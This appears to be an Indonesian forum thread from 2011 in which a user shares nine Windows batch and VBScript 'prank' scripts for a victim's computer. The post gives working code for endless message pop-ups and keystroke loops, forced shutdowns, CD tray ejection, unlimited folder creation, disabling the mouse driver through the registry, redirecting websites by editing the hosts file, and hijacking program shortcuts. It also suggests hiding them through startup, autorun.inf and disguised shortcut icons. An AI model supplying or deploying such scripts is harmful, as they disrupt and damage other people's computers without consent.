Fixy-Fact
Hi,

Are you a member? Please Log In. If not, please click 'Register' on above menu. Quick to register and simply just click here to make an account, this account will become your identity while you enjoy full features of Fixy-Fact forum and make sure you fill in data with correctly.

Make sure you read terms of agreement in our forum to prevent disobedient, click here to go.

Thank you for your concern!

Best,
Fixy-Fact Team

9 script jail (biar jadul namun asyikk) :P

Go down

9 script jail (biar jadul namun asyikk) :P

Post by τεχνολογία on Thu Jan 27, 2011 7:21 pm

ane pengen share script2 lain yg lumayan ngeselin orang abizzz
dan ada yang berguna juga tergantung gimana temen2 modif kata2 nya
bisa di kombinasiin sendiri yah....misal nya di taruh di startup..
modif2 sendiri yah seperti penambahan autorun.inf dan mengganti gambar shocutnya, dll

buka notepad lalu copy paste script di bawah.....

1.message yang nongol melulu


Code:
@ECHO off
:Begin
msg * muka w ganteng
msg * ngaca dulu gih
msg * hayo lo,cpu lu saya acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT
ket:
walaupun di kill task manager,masih tetep nongol message nya
kata2 nya bisa diganti sesuai selera masing2...
apalagi yg sedang jatuh cinta...kasih tuh ke gebetan lu...
di kirain cinta gila...

2.bikin shutdown+message

Code:
Code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"
save namafile.BAT

3.Mainin Caps Lock button

Code:
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

4.buka tutup CD/DVD

Code:
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs
ampir mirip ama punya nya habs

5.bikin vbscript nongol mlulu

Code:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

6.serbuan folder

Code:
@echo off
:top
md %random%
goto top

7.mematikan mouse

Code:
@echo off
set key="HKEY_lOCAL_MACHINE\system\
CurrentControlSet\Services\Mouclass"

reg delete %key%
reg add %key% /v Start/t REG_DWORD /d 4

8.salah alamat


1.langkah pertama adalah mengetahui IP adress dari google dan yahoo
2.buka cmd ketik ping yahoo.com atau website apa saja yg anda inginkan
3.setelah itu lakukan hal yg sama untuk mengetahui IP adress google atau website lain yg anda inginkan
4.setelah itu pada komputer korban buka direktori C:\windows\system32\driver\etc kemudian cari file host
5.buka file host dengan notepad, kemudian pada baris paling bawah masukan IP adress diikuti nama website.
contoh : 111.222.222.22 website.com
6.tuliskan IP adress yahoo dengan nama website google dan sebaliknya.

selesai..

9.komputer restart terus

kllik kanan pada shorcut program apa saja yg diduga sering digunakan oleh korban, kemudian pada dialog windows properties ubah target menjadi "%windir%\system32\shutdown.exe -s


lumayan untuk ngisengin temen..
Silent Smile


_______________________________________________________________

Smiley Beer Smiley Beer Smiley Beer


Last edited by τεχνολογία on Sun Jan 30, 2011 5:00 pm; edited 3 times in total
avatar
τεχνολογία
Fixy-Fact Citizen
Fixy-Fact Citizen

Posts : 18
Credits : 5052
Reputation : 3
City : MARS
Browser : Mozilla Firefox

View user profile

Back to top Go down

Re: 9 script jail (biar jadul namun asyikk) :P

Post by DonFixyboys* on Sat Jan 29, 2011 3:10 pm

mantep nih ^^,
avatar
DonFixyboys*
The Godfather
The Godfather

Posts : 642
Credits : 1395
Reputation : 26
City : Jakarta
Browser : Mozilla Firefox

View user profile

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum